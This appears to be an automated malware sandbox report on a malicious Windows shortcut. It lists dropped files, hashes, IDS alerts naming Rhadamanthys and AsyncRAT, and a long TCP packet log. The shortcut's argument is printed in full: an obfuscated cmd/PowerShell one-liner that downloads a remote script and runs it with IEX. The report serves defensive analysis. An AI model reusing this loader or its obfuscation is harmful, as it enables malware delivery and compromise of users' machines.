Preview:	........D...........{.?....^...H...E>.,..$.....P.-.-.X..fTJ..^.....a..u......X...........Y..................5z...I.-..d...<.=.c............i....}.>..............o..............,..0..7m.:.h...a6@6:N.zN..........x...uJ....-f.y...$'....4v.-K.]..n.]..Qv.........5z...I.-..d...<.=.c............i....}.>.............x...uJ....-f.y...$'....4v.-K.]..n.]..Qv...........o..............,..0..7m.:.h...a6@6:N.zN.........5z...I.-..d...<.=.c............i....}.>.............x...uJ....-f.y...$'....4v.-K.]..n.]..Qv...........o..............,..0..7m.:.h...a6@6:N.zN................uTox User .......Toxing on uTox, from the future!.................t........%a.t....q...5...W..~..y+=h..\oM.....e............V:........D8...7.&_....Jn3..NtC.z.2...I...........o..............,..0..7m.:.h...a6@6:N.zN.........5z...I.-..d...<.=.c............i....}.>.............x...uJ....-f.y...$'....4v.-K.]..n.]..Qv..............T.l..._*GQ..Y.......^.C..r..;.j.l,...n...F..wn..e_..G}....$.....<..;d.....m..<...@..

C:\Users\user\AppData\Roaming\Tox\utox_save.ini

Download File

Process:	C:\Users\user\Desktop\utox_x86_x64.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.9400726873486547
Encrypted:	false
SSDEEP:	3:VcM6RQRov:VcM6Ky
MD5:	5B4E46B79998EE26C8F854677A591421
SHA1:	7A6F479B28D7AB6E28582AF0AEE03FF2E923D57F
SHA-256:	F3780570DA34038FFD91A135C23D0EF83EE1F4368E7E5088C4D8B44B87BD8E8A
SHA-512:	211EAF9EB13C461961AD0538B26452160814D08789C3D6CDD879EF74D0DB374C3D9F55B85D0EFB89C841778BDD269E1E3496F91DC0CF77205C7C030A4E8C754C
Malicious:	false
Preview:	[general]..save_version=4..

C:\Users\user\AppData\Roaming\Tox\utox_save.in~

Download File

Process:	C:\Users\user\Desktop\utox_x86_x64.exe
File Type:	Generic INItialization configuration [interface]
Category:	dropped
Size (bytes):	708
Entropy (8bit):	4.648717284766249
Encrypted:	false
SSDEEP:	12:VGK+WHTshKsaRVmfq/tOE8JfnIYuv8jy+SthXiJX7rAQtJhiq+auyYVS0v9:VGK+WHMKsaRVmf0EbnIYu02WtHDfAVS8
MD5:	4936FFCD5B5217817FACFA40DD6BF3C3
SHA1:	6F340BF744570CEF6537BD0A7E93DCC32F90D80E
SHA-256:	1BFB54EA4231FA9922F3F33581D05924131788F8556938C77842B6C21BC7FECD
SHA-512:	1A04A33846641ED3C8F4D0FE1FC0AD26FEB9A55D229D202E69CCE97FA09FC14AB00D810C3A80F3A50D7FB255698005A5883F115727207BD4BAF81C80A2DFB3FD
Malicious:	false
Preview:	[general]..save_version=4..utox_last_version=4609..[interface]..language=0..window_x=0..window_y=0..window_width=750..window_height=500..theme=0..scale=10..logging_enabled=true..close_to_tray=false..start_in_tray=false..auto_startup=false..use_mini_flist=false..filter=false..magic_flist_enabled=false..use_long_time_msg=true..[av]..push_to_talk=false..audio_filtering_enabled=true..audio_device_in=0..audio_device_out=0..video_fps=25..[notifications]..audible_notifications_enabled=true..status_notifications=true..no_typing_notifications=true..group_notifications=2..[advanced]..enableipv6=true..disableudp=false..proxyenable=false..proxy_port=0..proxy_ip=..force_proxy=false..block_friend_requests=false..

C:\Users\user\Desktop\utox_x86_x64.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971787
Entropy (8bit):	6.423642262672567
Encrypted:	false
SSDEEP:	98304:uVS4lyfvsVqltyD5DhADNlXQ2orLmKeLDCVvANLA1pOuI8F7fqLmLhPR6x7:vkPD52
MD5:	E9679980AA73CFC7CF00F3DA7949C661
SHA1:	53BA9E3A3A10AE0E72DF4B3632D8D4135EB540B6
SHA-256:	D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97
SHA-512:	002AAC023E1BBE3BBBF153EBC5462970AA98C84BADEA6BC1B8D333C98A5ED91540928B8848A9928607E12C0A1296A12424B2C2B0753E23AFEB537249F04DB8BC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: path.ps1, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... _.`..A.f^....&...."..)..64...............@...............................W.....;uL....... ......................................PI......pI..3....I......p1...............J............................. c0.(....................\|I..............................text.....).......).................`.P`.data...`.....).......).............@.p..rdata..p....p......d.............@.p@.rodata......`1......P1.............@.P@.pdata.......p1......^1.............@.0@.xdata.......P2......22.............@.0@.bss.........P3.......................p..edata.......PI......&3.............@.0@.idata...3...pI..4...:3.............@.0..CRT..........I......n3.............@.@..tls..........I......p3.............@.@..rsrc.........I......r3.............@.0..reloc........J......$4.............@.0B/4......P.....J......<4.............@.PB/19...........J......N4.............@..B/31.....

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=19, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	3.62280660854303
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	fBcMVl6ns6.lnk
File size:	1'330 bytes
MD5:	ae44dfe179f7ab8400c90b2d208ff313
SHA1:	7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
SHA256:	5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
SHA512:	5b451ef8b7043300bd9809285f8f283f2bda096d06f80560e48c89e5992981f0b5de20ed8a3fcdf3e8ff5e4be5672791a713e68a39571d25683db02f5720922a
SSDEEP:	24:8pJ/ByUS+foum9GCYYcWtAW9Gz2t7q3zlw4dq4ArabY:8v439GCYYcWtSi23Jw4dq4ma
TLSH:	1E21291CACD60B15F7F28639B8BA3250C86E7A1DE955CFCD0180C98E1956650F869E3F
File Content Preview:	L..................F........................................................5....P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........system32..B.....................

File Icon


Icon Hash:	0092ce8636496dad

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\Windows\system32\cmd.exe
Command Line Argument:	/c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Icon location:	imageres.dll

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T20:52:30.208812+0200	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	147.45.126.71	3752	192.168.2.8	49716	TCP
2024-10-08T20:52:40.631445+0200	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	147.45.126.71	3752	192.168.2.8	49717	TCP
2024-10-08T20:52:40.631445+0200	2854824	ETPRO JA3 HASH Suspected Malware Related Response	2	147.45.126.71	3752	192.168.2.8	49717	TCP
2024-10-08T20:52:50.679436+0200	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	147.45.126.71	3752	192.168.2.8	49718	TCP
2024-10-08T20:52:50.679436+0200	2854824	ETPRO JA3 HASH Suspected Malware Related Response	2	147.45.126.71	3752	192.168.2.8	49718	TCP
2024-10-08T20:53:17.791891+0200	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	185.196.9.174	7777	192.168.2.8	55203	TCP
2024-10-08T20:53:33.701983+0200	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	46.29.238.96	4872	192.168.2.8	55220	TCP
2024-10-08T20:54:12.216580+0200	2854802	ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert	1	46.29.238.96	4872	192.168.2.8	59236	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 20:51:57.904499054 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:57.904572964 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:57.905467033 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:57.906775951 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:57.910826921 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:57.913187027 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:57.913252115 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:57.913336039 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:57.913388014 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:57.915853977 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:57.916177988 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:57.921838045 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:57.962652922 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.015235901 CEST	49676	443	192.168.2.8	52.182.143.211
Oct 8, 2024 20:51:58.222963095 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.223000050 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.223045111 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.223076105 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.223109961 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.223150015 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.223155975 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.223315954 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.223365068 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.227606058 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.228063107 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.228089094 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.228600025 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.228878021 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.233369112 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.234306097 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.235249996 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.325062037 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.325396061 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.325472116 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.327466965 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.327478886 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.327493906 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.327573061 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.328516960 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.332617998 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.333425045 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.333744049 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.334718943 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.337482929 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.338658094 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.339735031 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.429580927 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.432674885 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.432810068 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.432826042 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.432837963 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.432893038 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.433159113 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.435553074 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.435928106 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.438246965 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.440478086 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.440727949 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.522603035 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.525475025 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.526671886 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.530632973 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.531826973 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.532341003 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.532630920 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.532697916 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.535612106 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.536658049 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.543107033 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.619538069 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.626122952 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.626144886 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.626240015 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.634815931 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.634924889 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.635251045 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.670049906 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.722750902 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.766757011 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.789055109 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.792709112 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.794850111 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.799321890 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.810626984 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.816317081 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.818471909 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.824523926 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.827815056 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.832818985 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.911511898 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.917047024 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.917140007 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:58.920231104 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.920392036 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:58.920459032 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.005023956 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.046451092 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.139636993 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.144665956 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.153686047 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.159157038 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.162806988 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.163350105 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.167859077 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.168411970 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.197654009 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.202773094 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.236264944 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.257029057 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.257153988 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.262789011 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.262806892 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.262881994 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.280846119 CEST	49671	443	192.168.2.8	204.79.197.203
Oct 8, 2024 20:51:59.307904959 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.318028927 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.320430994 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.324661970 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.325665951 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.332130909 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.337613106 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.346306086 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.398622990 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.421487093 CEST	49673	443	192.168.2.8	23.206.229.226
Oct 8, 2024 20:51:59.440638065 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.440751076 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.440767050 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.440924883 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.449103117 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.449198008 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.480849028 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.486011982 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.496627092 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.497806072 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.499429941 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.501672029 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.503434896 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.504312992 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.506968975 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.562074900 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.577497005 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.590584040 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.596410990 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.596506119 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.596535921 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.608973026 CEST	49677	80	192.168.2.8	192.229.211.108
Oct 8, 2024 20:51:59.640193939 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.643621922 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.645565987 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.647074938 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.652429104 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.664530039 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.664657116 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.669585943 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.679044008 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.687541008 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.738672972 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.744751930 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.745456934 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.745646954 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.748301029 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.748366117 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.749578953 CEST	49672	443	192.168.2.8	23.206.229.226
Oct 8, 2024 20:51:59.753345966 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.761667967 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.761816025 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.761872053 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.764036894 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.764137983 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.769035101 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.836685896 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.839688063 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.845712900 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.846420050 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.846486092 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.848902941 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.849025965 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.855637074 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.865684032 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.866430998 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.866492033 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.869185925 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.869277954 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.874512911 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.942970037 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.945707083 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.947613001 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.947694063 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.947756052 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.947810888 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.950023890 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.951103926 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.955004930 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.969012976 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.969049931 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:51:59.969109058 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.972708941 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.973087072 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:51:59.979883909 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.049308062 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.049381018 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.049484015 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.052654982 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.052733898 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.057508945 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.057940960 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.059362888 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.071496010 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.071671009 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.071727037 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.076124907 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.076252937 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.081510067 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.149743080 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.150191069 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.150243044 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.152842999 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.153443098 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.158356905 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.160459995 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.162467003 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.173310995 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.173398018 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.173468113 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.175438881 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.175542116 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.180505991 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.251584053 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.251597881 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.251693010 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.254455090 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.254584074 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.259483099 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.272310972 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.272821903 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.272874117 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.274909019 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.274996996 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.280114889 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.343236923 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.346266031 CEST	49704	443	192.168.2.8	13.107.246.60
